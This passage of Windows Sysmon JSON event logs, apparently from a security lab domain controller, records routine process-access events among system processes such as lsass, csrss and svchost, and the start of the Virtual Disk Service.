06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.495\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-00108AEF0200}\r\nTargetProcessId: 3448\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.495","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-00108AEF0200}","TargetProcessId":"3448","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.498\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.498","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.498\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.498","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-00108AEF0200}\r\nTargetProcessId: 3448\r\nTargetImage: C:\\Windows\\System32\\vdsldr.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-00108AEF0200}","TargetProcessId":"3448","TargetImage":"C:\\Windows\\System32\\vdsldr.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.505\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.505","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.505\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.505","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.505\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.505","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.518\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-0010E2FD0200}\r\nProcessId: 3520\r\nImage: C:\\Windows\\System32\\vds.exe\r\nFileVersion: 10.0.14393.2608 (rs1_release.181024-1742)\r\nDescription: Virtual Disk Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: vds.exe\r\nCommandLine: C:\\Windows\\System32\\vds.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: 